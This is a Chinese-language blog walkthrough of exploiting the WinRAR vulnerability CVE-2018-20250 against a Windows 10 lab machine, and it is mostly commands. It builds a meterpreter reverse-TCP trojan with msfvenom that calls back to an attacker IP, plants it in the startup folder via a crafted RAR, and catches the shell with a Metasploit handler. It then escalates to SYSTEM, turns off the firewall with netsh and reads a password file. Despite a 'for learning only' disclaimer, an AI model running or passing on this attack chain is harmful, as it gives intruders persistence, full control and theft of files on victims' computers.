CVE-2018-20250

学习交流,技术分享,不要搞事
参考大佬 博客 https://blog.csdn.net/DarkHQ/article/details/88682390
小白一个 一下文章中有 未使用正确的专业术语请。。。。提出或无视
事先准备好 目标渗透机器(后文简称靶机 ip:192.160.25.150 开启防火墙)

在这里插入图片描述
(1)下载WinRAR漏洞exp:https://github.com/WyAtu/CVE-2018-20250
在这里插入图片描述
(3)编辑winrar漏洞exp文件

vi exp.py

按i进行编辑

img

修改python3的运行命令

img

修改完后按esc退出编辑,然后按:,输入wq保存

打开kali系统 并将目录 切换到 CVE-2018-20250 文件目录下 右键在终端打开

在本目录制作exe木马文件

lhost=你kali攻击机的ip iport=统一的端口 建议设置1024数值之上

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.160.25.131 lport=1234 -f exe >./test.exe在这里插入图片描述
在这里插入图片描述

受漏洞影响解压软件版本

WinRAR < 5.70 Beta 1

Bandizip< = 6.2.0.0

好压(2345压缩) < = 5.9.8.10907

360压缩< = 4.0.0.1170

制作木马rar文件

python3 exp.py 进行编写在这里插入图片描述
建立网页(可选操作,此操作只是为了更方便的 传输木马rar文件)

python -m SimpleHTTPServer 999
在这里插入图片描述
单击启动metasploit 下文简称msf

在这里插入图片描述
启用监听1234 端口 (此端口同上)

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.160.25.131

set lport 1234
在这里插入图片描述
输入 上文 并 run 启动

在靶机上进行操作
在这里插入图片描述

注意 途中会被杀毒软件查杀 ,原因是 此漏洞是被发现且修复的,而且 木马文件并未做免杀处理 ,这里统一处理为 默认允许

受漏洞影响解压软件版本

WinRAR < 5.70 Beta 1

Bandizip< = 6.2.0.0

好压(2345压缩) < = 5.9.8.10907

360压缩< = 4.0.0.1170

切记解压软件版本只能是以上的漏洞版本

重启 win10靶机(木马已经被加入开机启动项)

在cmd中输入 netstart -ano 查看计算机端口占用情况
在这里插入图片描述
当前已经产生会话,实现监听
在这里插入图片描述
输入 shell 反弹
在这里插入图片描述
可以输入用户级别任意命令 可实现远程关机,包括查看文件、删除文件等

shutdown -r -t 5(5秒钟后重启)
在这里插入图片描述
权限提升 因为当前获得的权限仅用户权限,需要拿到最高权限windows:system,linux:root

输入 exit 退出
在这里插入图片描述
getuid 查看当前获得的权限级别

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4jgPdQwp-1609038269285)(C:\Users\master\AppData\Roaming\Typora\typora-user-images)]

background 保存并退出会话 ps:查看 当前第几会话

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fyTI7f8b-1609038269287)(C:\Users\master\AppData\Roaming\Typora\typora-user-images\image-20201227085801697.png)]

use exploit/windows/local/ask

set session 当前会话

set filename 迷惑名称.exe

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传image-20201227090016267.png

run

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-U3rAFEUY-1609038269291)(C:\Users\master\AppData\Roaming\Typora\typora-user-images\image-20201227090039499.png)]

此时会弹出来对话框 靶机允许

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Vgfu4O0s-1609038269293)(C:\Users\master\AppData\Roaming\Typora\typora-user-images\image-20201227090130204.png)]

getuid 查看权限

getsystem 提升到system 权限

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uHunJyl2-1609038269294)(C:\Users\master\AppData\Roaming\Typora\typora-user-images\image-20201227092334980.png)]

shell

NetSh Advfirewall set allprofiles state off #关闭防火墙

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DfIvmw7F-1609038269295)(C:\Users\master\Desktop\0k1d7-un1m7.gif)]

下列有些命令 自行摸索

Type password.txt

shutdown -r -t 5

NetSh Advfirewall set allprofiles state off #关闭防火墙

Netsh Advfirewall show allprofiles #查看防火墙状态

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值